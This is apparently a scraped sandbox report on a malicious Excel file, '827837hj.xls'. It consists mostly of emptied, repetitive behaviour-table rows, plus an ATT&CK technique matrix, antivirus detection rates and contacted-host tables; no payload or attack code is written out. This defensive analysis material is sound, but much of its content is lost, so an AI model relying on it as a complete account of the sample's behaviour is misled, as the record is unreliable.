| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Process token adjusted: | |||
| Source: | Code function: | 12_2_0039A4B2 | |
| Source: | Code function: | 20_2_0039A4B2 | |
| Source: | Code function: | 12_2_0038E51E | |
| Source: | Code function: | 12_2_003A413D | |
| Source: | Code function: | 12_2_0038E52A | |
| Source: | Code function: | 20_2_0038E51E | |
| Source: | Code function: | 20_2_003A413D | |
| Source: | Code function: | 20_2_0038E52A | |
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Code function: | 12_2_0032C480 | |
| Source: | Code function: | 12_2_0032C620 | |
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Queries volume information: | |||
| Source: | Code function: | 12_2_003A828B | |
| Source: | Code function: | 12_2_003A84E1 | |
| Source: | Code function: | 12_2_003A857C | |
| Source: | Code function: | 12_2_003A2787 | |
| Source: | Code function: | 12_2_003A87CF | |
| Source: | Code function: | 12_2_003A882E | |
| Source: | Code function: | 12_2_002F4877 | |
| Source: | Code function: | 12_2_003A8903 | |
| Source: | Code function: | 12_2_003A894E | |
| Source: | Code function: | 12_2_003A89F5 | |
| Source: | Code function: | 12_2_003A8AFB | |
| Source: | Code function: | 12_2_003A2ED5 | |
| Source: | Code function: | 20_2_003A828B | |
| Source: | Code function: | 20_2_003A84E1 | |
| Source: | Code function: | 20_2_003A857C | |
| Source: | Code function: | 20_2_003A2787 | |
| Source: | Code function: | 20_2_003A87CF | |
| Source: | Code function: | 20_2_003A882E | |
| Source: | Code function: | 20_2_002F4877 | |
| Source: | Code function: | 20_2_003A8903 | |
| Source: | Code function: | 20_2_003A894E | |
| Source: | Code function: | 20_2_003A89F5 | |
| Source: | Code function: | 20_2_003A8AFB | |
| Source: | Code function: | 20_2_003A2ED5 | |
| Source: | Code function: | 20_2_002F1BA9 | |
| Source: | Code function: | 12_2_0037E0B0 | |
| Source: | Code function: | 12_2_0037EF00 | |
| Source: | Code function: | 12_2_0038E3DC | |
| Source: | Code function: | 20_2_003B3AB4 | |
| Source: | Code function: | 12_2_0032CBA0 | |
| Source: | Code function: | 12_2_003569E0 | |
| Source: | Code function: | 12_2_00326250 | |
| Source: | Code function: | 20_2_00326250 | |
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 12 Command and Scripting Interpreter | Path Interception | 12 Process Injection | 111 Masquerading | 11 Input Capture | 2 System Time Discovery | Remote Services | 11 Input Capture | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 22 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 21 Virtualization/Sandbox Evasion | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 12 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 11 Deobfuscate/Decode Files or Information | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 22 Scripting | LSA Secrets | 11 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 2 File and Directory Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 34 System Information Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 24% | ReversingLabs | Script.Trojan.Woreflint | ||
| 41% | Virustotal | Browse | ||
| 100% | Joe Sandbox ML |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | ReversingLabs | |||
| 3% | Virustotal | Browse |
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| the.earth.li | 93.93.131.124 | true | false | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | high | ||
| false | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| low | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 93.93.131.124 | the.earth.li | United Kingdom | 44684 | MYTHICMythicBeastsLtdGB | false |
| IP |
|---|
| 192.168.2.1 |
| Joe Sandbox Version: | 36.0.0 Rainbow Opal |
| Analysis ID: | 760118 |
| Start date and time: | 2022-12-04 12:04:50 +01:00 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 20m 15s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | 827837hj.xls |
| Cookbook file name: | defaultwindowsofficecookbook.jbs |
| Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
| Run name: | Potential for more IOCs and behavior |
| Number of analysed new started processes analysed: | 111 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal76.expl.evad.winXLS@165/50@24/2 |
| EGA Information: |
|
| HDC Information: | Failed |
| HCA Information: |
|
| Cookbook Comments: |
|
- Max analysis timeout: 600s exceeded, the analysis took too long
- Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, audiodg.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, backgroundTaskHost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.109.88.191, 20.25.84.51, 23.35.236.109, 40.127.240.158, 51.104.136.2
- Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, settings-prod-neu-2.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, atm-settingsfe-prod-geo2.trafficmanager.net, login.live.com, config.officeapps.live.com, e16604.g.akamaiedge.net, nexus.officeapps.live.com, settings-prod-neu-1.northeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, europe.configsvc1.live.com.akadns.net
- Not all processes where analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 12:05:55 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| 93.93.131.124 | Get hash | malicious | Browse |
| |
| Get hash | malicious | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| the.earth.li | Get hash | malicious | Browse |
| |
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
